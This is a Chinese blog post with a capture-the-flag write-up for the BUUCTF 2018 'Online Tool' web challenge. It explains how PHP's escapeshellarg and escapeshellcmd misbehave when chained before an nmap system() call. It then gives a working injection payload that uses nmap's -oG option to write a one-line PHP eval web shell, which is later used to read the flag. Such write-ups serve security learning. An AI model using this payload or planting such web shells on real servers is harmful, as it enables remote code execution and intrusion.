当前位置:网站首页>BUUCTF WEB [BUUCTF 2018]Online Tool
BUUCTF WEB [BUUCTF 2018]Online Tool
2022-04-23 12:27:00 【Y1Daa】
BUUCTF WEB [BUUCTF 2018]Online Tool
-
进入环境,得到一段代码
<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR']; } if(!isset($_GET['host'])) { highlight_file(__FILE__); } else { $host = $_GET['host']; $host = escapeshellarg($host); $host = escapeshellcmd($host); $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']); echo 'you are in sandbox '.$sandbox; @mkdir($sandbox); chdir($sandbox); echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
其中,
escapeshellarg()
函数用于把字符串转码为可以在 shell 命令里使用的参数,也就是将单引号等特殊符号转义,并将转义后的单引号前后用另外的两个单引号包裹<?php echo escapeshellarg("123"); // '123' echo escapeshellarg("12' 3");// '12'\'' 3' ?>
escapeshellcmd()
函数用于 shell 元字符转义 ,就是在特殊字符和没有配对的单引号前插入\
<?php echo escapeshellcmd("123"); // 123 echo escapeshellcmd("12' 3");// 12\' 3 echo escapeshellcmd("12'' 3");// 12'' 3 ?>
这里可以参照这篇文章 谈谈escapeshellarg参数绕过和注入的问题 (lmxspace.com) 了解本题如何解
-
因为两个过滤的存在,我们只能执行一条命令。在nmap中存在几个参数
OUTPUT: -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename.
可以向文件中写入命令和结果
-
这里我们可以利用
escapeshellarg
与escapeshellcmd
一起使用的漏洞构造一个命令执行漏洞?host=' <?php @eval($_POST["cmd"]);?> -oG shell.php '
回显为
you are in sandbox ae49321bc77b6271cb2db4ba23d835f1Starting Nmap 7.70 ( https://nmap.org ) at 2022-04-22 05:26 UTC Nmap done: 0 IP addresses (0 hosts up) scanned in 1.15 seconds Nmap done: 0 IP addresses (0 hosts up) scanned in 1.15 seconds
-
使用蚁剑连接,在文件根目录下找到flag文件
flag{24d949bf-db37-41b9-9e74-9f9e202d0af7}
版权声明
本文为[Y1Daa]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_51412071/article/details/124343895
边栏推荐
- 如果你是一个Golang面试官,你会问哪些问题?
- Win10 splash screen after startup
- 【unity笔记】L4Unity中的基础光照
- 九十八、freemarker框架报错 s.e.ErrorMvcAutoConfiguration$StaticView : Cannot render error page for request
- Qt一个进程运行另一个进程
- AD20补充笔记3—快捷键+持续更新
- [wechat applet] Z-index is invalid
- 远程桌面之终端服务器超出了最大允许连接数解决
- Lesson 25 static member variables of classes
- STM32工程移植:不同型号芯片工程之间的移植:ZE到C8
猜你喜欢
VMware virtual machines export hard disk vmdk files using esxi
SPSS之单因素方差分析
NativeForMySQL 连接MySQL8 提示:1251- Client does not support authentication protocol
Zero trust in network information security
基于卷积神经网络的遥感影像分类识别系统
同态加密技术学习
SQL exercise (I)
Intelligent multi line elastic cloud adds independent IP address. How to realize multi line function?
Message queuing overview
IDEA 代码格式化插件Save Actions
随机推荐
How do traditional enterprises cope with digital transformation? These books give you the answer
How do programmers finalize nucleic acid statistics with 130 lines of code
After a circle, I sorted out this set of interview questions..
RT-thread中关键词解释及部分API
Zero trust in network information security
uni-app 原生APP-云打包集成极光推送(JG-JPUSH)详细教程
Outsourcing for five years, abandoned
Qt重绘事件与剪切
Xinwangda announced that the price of battery products had been increased, and the investment of "weixiaoli" exceeded 1 billion
c# 设置logo图标和快捷方式的图标
Next. JS static data generation and server-side rendering
QT interprocess communication
欣旺达宣布电池产品涨价 此前获“蔚小理”投资超10亿
AI 视频云 VS 窄带高清,谁是视频时代的宠儿
QT double buffer drawing
NBIOT的AT指令
Qt双缓冲绘图
同态加密技术学习
CGC: contractual graph clustering for community detection and tracking
Uni app native app cloud packaging integrated Aurora push (jg-jpush) detailed tutorial